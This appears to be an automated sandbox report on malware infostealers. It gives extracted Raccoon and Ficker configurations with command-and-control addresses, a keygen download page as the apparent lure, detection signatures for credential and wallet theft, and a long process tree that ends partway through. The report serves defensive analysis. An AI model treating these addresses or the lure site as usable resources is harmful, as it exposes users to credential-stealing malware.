Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 19:22

General

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected facebook phishing page
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 61 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:492
    • C:\Users\Admin\AppData\Roaming\hijfaae
      C:\Users\Admin\AppData\Roaming\hijfaae
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:6888
      • C:\Users\Admin\AppData\Roaming\hijfaae
        C:\Users\Admin\AppData\Roaming\hijfaae
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        PID:1820
    • C:\Users\Admin\AppData\Roaming\uvjfaae
      C:\Users\Admin\AppData\Roaming\uvjfaae
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      PID:6660
    • C:\Users\Admin\AppData\Roaming\hijfaae
      C:\Users\Admin\AppData\Roaming\hijfaae
      2⤵
      • Suspicious use of SetThreadContext
      PID:6572
      • C:\Users\Admin\AppData\Roaming\hijfaae
        C:\Users\Admin\AppData\Roaming\hijfaae
        3⤵
        • Checks SCSI registry key(s)
        PID:740
    • C:\Users\Admin\AppData\Roaming\uvjfaae
      C:\Users\Admin\AppData\Roaming\uvjfaae
      2⤵
      • Checks SCSI registry key(s)
      PID:4944
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1188
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1952
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2532
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2796
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
          1⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4800
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffda5ad4f50,0x7ffda5ad4f60,0x7ffda5ad4f70
            2⤵
              PID:4928
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1660 /prefetch:2
              2⤵
                PID:4280
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1708 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:736
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 /prefetch:8
                2⤵
                  PID:4176
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1
                  2⤵
                    PID:1080
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
                    2⤵
                      PID:1216
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
                      2⤵
                        PID:1988
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
                        2⤵
                          PID:2220
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
                          2⤵
                            PID:2352
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
                            2⤵
                              PID:2528
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4012 /prefetch:8
                              2⤵
                                PID:1852
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4492
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6248 /prefetch:8
                                2⤵
                                  PID:4104
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6416 /prefetch:8
                                  2⤵
                                    PID:3200
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6752 /prefetch:8
                                    2⤵
                                      PID:500
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6736 /prefetch:8
                                      2⤵
                                        PID:1156
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:8
                                        2⤵
                                          PID:1416
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6836 /prefetch:8
                                          2⤵
                                            PID:1280
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6880 /prefetch:8
                                            2⤵
                                              PID:2376
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6844 /prefetch:8
                                              2⤵
                                                PID:2520
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:8
                                                2⤵
                                                  PID:3884
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                  2⤵
                                                    PID:4600
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff64023a890,0x7ff64023a8a0,0x7ff64023a8b0
                                                      3⤵
                                                        PID:4564
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6716 /prefetch:8
                                                      2⤵
                                                        PID:2132
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6656 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4736
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6392 /prefetch:8
                                                        2⤵
                                                          PID:4664
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6336 /prefetch:8
                                                          2⤵
                                                            PID:1528
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:8
                                                            2⤵
                                                              PID:3972
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:8
                                                              2⤵
                                                                PID:508
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:8
                                                                2⤵
                                                                  PID:3372
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7000 /prefetch:8
                                                                  2⤵
                                                                    PID:800
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:8
                                                                    2⤵
                                                                      PID:1276
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:8
                                                                      2⤵
                                                                        PID:1500
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
                                                                        2⤵
                                                                          PID:1152
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7408 /prefetch:8
                                                                          2⤵
                                                                            PID:2560
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
                                                                            2⤵
                                                                              PID:2260
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:8
                                                                              2⤵
                                                                                PID:3480
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7544 /prefetch:8
                                                                                2⤵
                                                                                  PID:4588
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6812 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5044
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6580 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3188
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4636
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7772 /prefetch:8
                                                                                        2⤵
                                                                                          PID:3092
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8052 /prefetch:8
                                                                                          2⤵
                                                                                            PID:2788
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8064 /prefetch:8
                                                                                            2⤵
                                                                                              PID:1908
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8320 /prefetch:8
                                                                                              2⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2200
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8316 /prefetch:8
                                                                                              2⤵
                                                                                                PID:3200
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8472 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:2040
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8604 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:1344
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8724 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:3516
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8892 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5128
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8904 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5140
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9144 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5200
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7036 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:5236
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5276
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5288
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5400
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9116 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5548
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5612
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2340 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5728
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7753696788216876735,10881431890644302864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5768
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
